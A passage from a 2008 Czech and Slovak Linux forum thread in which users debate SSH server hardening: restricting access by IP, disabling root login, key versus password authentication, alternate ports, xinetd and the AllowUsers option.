    ano, ale ak si vsimnes v mojom prispevku, som hovoril ze proti komu maju take (podla tvojho nazoru zabezpecenie z nevedomosti, by rumor) opatrenia vyznam ..
    presmerovanie ssh na iny port moze byt dobra vec, ak napriklad na ssh:22 bezi sshd, ktore je chroot-nute len napriklad pre uzivatelov COMPANY v /home/COMPANY , ssh > 1024 bezi sshd klasicky ..
    tak isto, ako si spominal, zabezpecit bud dostatocne silne heslo alebo prihlasovanie len pomocou klucov .. lenze i tu treba davat pozor, lebo privatny kluc (v tom lepsom pripade) je tiez chraneny len heslom .. takze sa kludne moze stat, ze zabezpecenie localnym heslom moze byt omnoho lepsie ako samotne prihlasovanie klucom, ked sa dokaze utocnik dostat ku klucom, ktore su zabeznecene primitivnym (pripade ziadnym) heslom (vynechavam teraz problematiku debility uzivatelov publikovania/posielania svojich privatnych klucov) ..

    napriek tomu tvrdim, ze nechat root uzivatela povoleneho na ssh nie je dobra volba .. ano, root moze byt zabezpeceny velmi silnym heslom, firewall moze povolovat len urcity burst packatov na ssh ale i tak .. ked nemusim, nepovolujem .. (tak isto ako nebudem trubit do sveta, ake mam logins na serveri)
    cely moj prispevok (a vlastne odpoved na hlavnu otazku v tomto vlakne) zhrniem:

    -o povolenie jedinej IPcky na ssh:  firewall/tcp wrappers (pripadne oboje)
    -o root nepovolovat, kym nie je treba: malokedy uzivatel potrebuje vsetky prava,ako ma root
    -o prihlasovanie pomocou klucov, pripadne silne lokalne heslo ( existuju programy/nastavenia, ktore kontroluju silu hesiel uzivatelov)
    
    .. a suhlasim s tebou, robit 'bezpecnostne opatrenia' len preto, ze som to niekde pocul, nema zmysel .. otazne je, do akej hlbky clovek chape, ako veci funguju a dokaze sa proti tomu branit .. ja napriklad neviem ako presne funguje sshd (neprogramoval som ho, jeho kody som nikdy nestudoval) a teda neviem, ake (potencionalne) slabe miesta ma .. ale to uz nepatri do tohto prispevku ..
    ..my server has more fans than britney..
    16.3.2008 15:59 Filip Jirsák | skóre: 68 | blog: Fa & Bi
    Rozbalit Rozbalit vše Re: sshd_config - ListenAdress
    Privátní klíč nemusí být chráněn jenom heslem. Může být uložen na nějakém externím zařízení, které při běžném způsobu používání nevydá privátní klíč, ale jen přijme data k zašifrování a heslo/PIN a vrátí zašifrovaný výsledek.

    Přesměrování sshd na jiný port, protože na portu 22 už mi běží jiná služba, je sice oprávněné, ale nijak to nesouvisí s původním tématem diskuze. V diskuzi bylo zmíněno přesměrování portu 22 z důvodu (pseudo)zabezpečení, vy ho přesměrováváte kvůli charakteru TCP/IP komunikace, kdy na jednom páru IP adresa:port může naslouchat jen jeden program.
    16.3.2008 16:54 matoo | skóre: 7
    Rozbalit Rozbalit vše Re: sshd_config - ListenAdress
    Privátní klíč nemusí být chráněn jenom heslem. Může být uložen na nějakém externím zařízení, které při běžném způsobu používání nevydá privátní klíč, ale jen přijme data k zašifrování a heslo/PIN a vrátí zašifrovaný výsledek.
    ano, samozrejme je viac variant - ja som chcel len povedat, ze to, ze ak si niekto zabezpeci login len klucom, este to neznamena, ze je to bezpecnejsia cesta ako autentifikacia prostrednictvom hesla.. myslim , ze uz ale nema zmysel dalej toto rozvijat - zbytocne mutit vodu tam, kde netreba .. suhlasim s misovym vyrokom, ze robit na oko zabezpecenie `lebo je to tak spravne` je nezmysel .. autor otazky dostal odpoved na co sa pytal, myslim, ze bude rozmumne to nechat uz tak ..
    ..my server has more fans than britney..
    16.3.2008 23:43 Michal Kubeček | skóre: 72 | Luštěnice
    Rozbalit Rozbalit vše Re: sshd_config - ListenAdress
    ja som chcel len povedat, ze to, ze ak si niekto zabezpeci login len klucom, este to neznamena, ze je to bezpecnejsia cesta ako autentifikacia prostrednictvom hesla

    Záleží na technickém provedení, ale pokud neuděláte něco postaveného na hlavu, určitě nebude méně bezpečná a téměř jistě bude bezpečnější.

    16.3.2008 23:38 Michal Kubeček | skóre: 72 | Luštěnice
    Rozbalit Rozbalit vše Re: sshd_config - ListenAdress
    presmerovanie ssh na iny port moze byt dobra vec, ak napriklad na ssh:22 bezi sshd, ktore je chroot-nute len napriklad pre uzivatelov COMPANY v /home/COMPANY , ssh > 1024 bezi sshd klasicky ..

    Což je ale něco úplně jiného, než o čem tam i tady byla řeč…

    napriek tomu tvrdim, ze nechat root uzivatela povoleneho na ssh nie je dobra volba ..

    Je hezké, že to tvrdíte, ale pokud nenapíšete proč, neočekávejte, že tomu budu přikládat nějakou váhu.

    tak isto ako nebudem trubit do sveta, ake mam logins na serveri

    Neměl byste spíš napsat, že to nebudete vědomě rozhlašovat? :-)

    MMMMMMMMM avatar 13.3.2008 13:32 MMMMMMMMM | skóre: 44 | blog: unstable | Valašsko :-)
    Rozbalit Rozbalit vše Re: sshd_config - ListenAdress
    není tohle elegantnější řešení? (host.deny a host.allow)
    MMMMMMMMM avatar 13.3.2008 13:34 MMMMMMMMM | skóre: 44 | blog: unstable | Valašsko :-)
    Rozbalit Rozbalit vše Re: sshd_config - ListenAdress
    13.3.2008 14:05 František Bublík | skóre: 16
    Rozbalit Rozbalit vše Re: sshd_config - ListenAdress
    Další elegantní řešení je spouštět ssh pomocí xinetd - démona, kterému se dá nadefinovat spouštění konkrétní služby (ftp, ssh a pod.) pro konkrétní IP adresu. Viz man xined.
    14.3.2008 15:06 hamič
    Rozbalit Rozbalit vše Re: sshd_config - ListenAdress
    Zajímavá je také volba AllowUsers, pro vyjmenování kdo se odkud může hlásit. Na tohle by to šlo taky použít, i když předchozí rady jsou k tomu vhodnější.
    14.3.2008 16:54 alkoholik | skóre: 40 | blog: Alkoholik
    Rozbalit Rozbalit vše Re: sshd_config - ListenAdress
    Jestli chces bezpeci, tak se podivej do manualu, jak funguje autorizace pres klice. A do sshd_config si pak nacpi PermitRootLogin without-password.

    Založit nové vláknoNahoru

    Tiskni Sdílej: Linkuj Jaggni to Vybrali.sme.sk Google Del.icio.us Facebook

    ISSN 1214-1267   www.czech-server.cz
    © 1999-2015 Nitemedia s. r. o. Všechna práva vyhrazena.